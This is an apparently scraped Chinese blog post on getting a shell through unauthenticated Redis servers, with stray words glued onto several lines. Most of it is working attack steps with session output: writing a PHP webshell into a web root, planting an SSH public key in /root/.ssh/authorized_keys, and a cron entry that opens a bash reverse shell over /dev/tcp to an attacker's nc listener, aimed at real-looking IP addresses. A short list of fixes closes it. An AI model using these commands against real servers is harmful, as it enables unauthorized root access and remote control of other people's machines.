Redis未受权漏洞利用方式

总结一下redis未受权拿shell:php

redis-cli -h ipweb

>info 查看系统类型redis

 

Windowsshell

1.找网站绝对路径
2.config set dir 绝对路径根路径
bash

config get dir服务器

config set dbfilename indexbak.phpssh

set webshell "<?php phpinfo();?>"tcp

save网站

 

Linux系统:spa

第一种:写密钥

第二种:写crotab反弹shell

第三种:找绝对路径写webshell

 

1)本地生成秘钥

root@GanDolf:~# ssh-keygen  -t rsa

 

2)将公钥写入一个文件

root@GanDolf:~# cd /root/.ssh/

root@GanDolf:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

3)链接redis写入文件root@GanDolf:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit

OK
root@GanDolf:~/.ssh# redis-cli  -h 210.73.90.xxx

210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
saOK
(1.40s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@GanDolf:~/.ssh# ssh

4)链接服务器

root@GanDolf:~/.ssh# ssh -i id_rsa root@210.73.90.xxx

 

 

2、 利用方式不须要猜 web路径,写到cron里面

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/xxx.xxx.xx.120/2333 0>&1\n\n"|redis-cli -h 42.121.237.23 -x set 1
redis-cli -h 42.121.237.23
42.121.237.23:6379> config set dir /var/spool/cron
OK
42.121.237.23:6379> config set dbfilename root
OK
42.121.237.23:6379> save
OK


而后本机nc -lvv 2333
一下子shell就弹回来了。

 

 

修复建议:

1)修改默认端口

2)监听本地端口

3)使用非root启动,不然出现漏洞1,直接拿到root权限

4)修改配置文件,禁用相关命令

相关文章
相关标签/搜索